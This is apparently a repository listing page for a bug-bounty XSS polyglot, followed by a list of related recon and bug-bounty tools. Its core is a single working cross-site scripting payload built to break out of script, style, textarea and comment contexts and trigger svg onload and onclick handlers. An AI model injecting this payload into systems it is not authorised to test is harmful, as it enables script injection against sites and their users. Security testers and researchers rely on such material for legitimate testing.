hakluke / ----svg-onload-alert---
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
☆11Updated 3 years ago
Related projects ⓘ
Alternatives and complementary repositories for ----svg-onload-alert---
- ☆13Updated 2 years ago
- ☆12Updated 2 years ago
- Bugbounty utility to store list of enumerated subdomains into an sqlite3 db [one liner style / Pipe and save]☆28Updated 3 years ago
- Enhanced 403 bypass header☆21Updated 2 years ago
- Alternative to XSS Hunter for blind XSS.☆48Updated last year
- Cool HackerOne Reports☆18Updated last year
- IIS shortname scanner + bruteforce☆47Updated 8 months ago
- ☆38Updated 3 years ago
- The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform☆9Updated 4 years ago
- KARMA is a simple bash script automation that can hit Shodan Premium API and find active IPs, ASN, Common Vulnerabilities, CVEs & Open Po…☆58Updated 3 years ago
- A BurpSuite plugin for BBRF☆24Updated 2 years ago
- Tool for making it easy to collect dns results from the CLI☆39Updated 2 months ago
- ☆12Updated 2 years ago
- gup aka Get All Urls parameters to create wordlists for brute forcing parameters.☆17Updated 2 years ago
- Magic Header Blind Xss tool (deliver blind xss payloads in request headers).☆27Updated 3 years ago
- An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability☆16Updated 3 years ago
- ☆33Updated 3 years ago
- SubzzZ to find possible subdomains using passive recon. Tool also support Permutations, Mutations, Alterations.☆38Updated 3 years ago
- a tool that compiles a csv of all h1 program stats☆46Updated last year
- A simple utility to generate domain names with all possible TLDs☆23Updated last year
- ☆43Updated 3 years ago
- Extract SSL certificate data (Subject Name, Subject Alt Names, Organisation)☆41Updated last year
- ☆19Updated 3 years ago
- ☆9Updated 3 years ago
- Python Script to Print the name of the companies that are acquired by a Target Company and the Time of Acquisition.☆24Updated 2 years ago
- Buggyapp is an vulnerable android application. This app can be used by pentesters, security researchers to practice Android application p…☆13Updated 2 years ago
- ☆24Updated 3 years ago
- A collection of scripts for bug-bounty related stuff☆38Updated 4 years ago
- An SSRF detector tool written in golang. I have fixed some errors and added some more payloads to it. But the tool credits go to z0idsec.☆43Updated 3 years ago
- A solid recon tool I use personally.☆30Updated last year